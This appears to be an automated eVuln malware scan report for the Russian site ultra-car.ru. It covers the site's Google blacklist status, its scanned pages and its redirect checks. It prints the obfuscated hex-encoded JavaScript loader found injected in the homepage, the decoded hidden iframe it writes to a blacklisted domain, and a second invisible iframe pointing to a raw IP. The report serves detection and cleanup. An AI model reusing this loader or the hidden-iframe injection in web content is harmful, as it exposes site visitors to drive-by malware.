New scan:

Malware Scanner report for ultra-car.ru

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ultra-car.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ultra-car.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ultra-car.ru/
200 OK
Content-Length: 23580
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: icqdosug.com

function v473913d752eb7(v473913d753694){ function v473913d753e5d () {var v473913d75462b=16; return v473913d75462b;} return(parseInt(v473913d753694,v473913d753e5d()));}function v473913d754df7(v473913d7555c6){ function v473913d756d37 () {return 2;} var v473913d755d9a='';for(v473913d756567=0; v473913d756567<v473913d7555c6.length; v473913d756567+=v473913d756d37()){ v473913d755d9a+=(String.fromCharCode(v473913d752eb7(v473913d7555c6.substr(v473913d756567, v473913d756d37()))));}return v473913d755d9a;} document.write(v473913d754df7('3C696672616D65206E616D653D27343262613538343465623527207372633D27687474703A2F2F696371646F7375672E636F6D2F706F6F642F696E6465782E706870272077696474683D333930206865696768743D343333207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='42ba5844eb5' src='http://icqdosug.com/pood/index.php' width=390 height=433 style='display:none'></iframe>

Hidden iFrame found.
size: 1x1     style: hidden
src: http://209.200.254.39/1.html

<iframe src='http://209.200.254.39/1.html' width='1' height='1' style='visibility: hidden;'>

http://ultra-car.ru/javasrc/stmenu.js
200 OK
Content-Length: 19681
Content-Type: application/javascript
clean
http://www.informer.ru/js/weather_eye_01/2.js
200 OK
Content-Length: 553
Content-Type: application/x-javascript
clean
http://tools.spylog.ru/counter2.2.js
200 OK
Content-Length: 5066
Content-Type: application/javascript
clean
http://ultra-car.ru/index/catalog/1
200 OK
Content-Length: 48077
Content-Type: text/html
clean
http://ultra-car.ru/index/catalog/2
200 OK
Content-Length: 46924
Content-Type: text/html
clean
http://ultra-car.ru/index/catalog/3
200 OK
Content-Length: 41905
Content-Type: text/html
clean
http://ultra-car.ru/index/catalog/4
200 OK
Content-Length: 31155
Content-Type: text/html
clean
http://ultra-car.ru/index/catalog/5
200 OK
Content-Length: 47881
Content-Type: text/html
clean
http://ultra-car.ru/index/catalog/6
200 OK
Content-Length: 19646
Content-Type: text/html
clean
http://ultra-car.ru/index/koleso/
500 Internal Server Error
Content-Length: 0
Content-Type: text/html
clean
http://ultra-car.ru/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://ultra-car.ru/index/transportation/1
200 OK
Content-Length: 25762
Content-Type: text/html
clean
http://ultra-car.ru/index/sitemenu/18
200 OK
Content-Length: 20814
Content-Type: text/html
clean
http://s15.takru.com/in.php?id=26112
200 OK
Content-Length: 2768
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ultra-car.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 02 Oct 2014 13:35:32 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=c72d7d71ab0153c96cc97abc52b1f945; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ultra-car.ru
Referer: http://www.google.com/search?q=ultra-car.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.